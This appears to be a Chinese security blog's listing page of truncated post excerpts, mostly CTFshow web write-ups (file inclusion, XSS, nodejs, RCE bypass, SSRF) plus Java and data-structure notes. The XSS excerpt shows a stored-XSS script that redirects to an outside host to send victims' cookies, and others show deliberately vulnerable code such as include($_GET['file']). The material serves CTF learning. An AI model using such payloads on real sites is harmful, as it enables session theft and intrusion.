储论 数据 定义:数据是信息的载体，所有能被输入到计算机中且能被计算机处理的符号的集合 例：生活中各种信息,如图片文字以及个人信息等   数据对象 定义: 具有相同性质的数据元素的集合,是数据的一个子集 例：所…

远程命令执行--RuntimeExec 代码： public class RuntimeExec { @RequestMapping("/runtime") public String RuntimeExec(Strin…

文件包含 ctfshow web78： 示例代码 if(isset($_GET['file'])){     $file = $_GET['file'];     include($file); }else{     h…

nodejs ctfshow web334： 打开题目之后给了一个zip的源码 打开题目环境之后给的是一个登录界面 分析zip源码 user.js   items: [     {username: 'CTFSHOW',…

XSS ctfshow web316: 第一关没有任何过滤，直接存储形xss把cookie发送到咱们站点 <script>document.location.href='https://bk.tlli.top…

常见的RCE以及ByPass 一、RCE漏洞 远程代码执行漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。 原理：服务器没有对执行命令的函数进行过滤，导致命令被执行。   二、…

SSRF服务端请求伪造   漏洞原理: Server-Side Request Forgery (SSRF，服务器端请求伪造) 漏洞是一种安全漏洞，允许攻击者向服务器发起欺骗性请求。攻击者利用这种漏洞可以探测、…

信息打点 常见的资产搜集方法： 1,企业信息资产搜集，如(爱企查，企查查，企信宝，小蓝本，天眼查) 2,备案信息查询 3,ip反查,证书查询,域名注册查询 4,网络空间如(fofa,360,全球鹰,shodan,钟馗之眼…

mybatis框架   快速入门 示例：查询user表所有的数据 步骤： 1，创建user表，添加数据 2，创建模块，导入坐标 3，编写Mybatis核心配置文件，替换连接信息，解决硬编码问题 4，编写SQL映…

反射 反射:加载类，并允许以编程的方式解剖类中的各种成分，成员变量，方法，构造器等等; 反射的作用，反射主要还是用来做框架   反射学什么？学习获取类的信息并操作他们 1，反射第一步，加载类，获取类的字节码，c…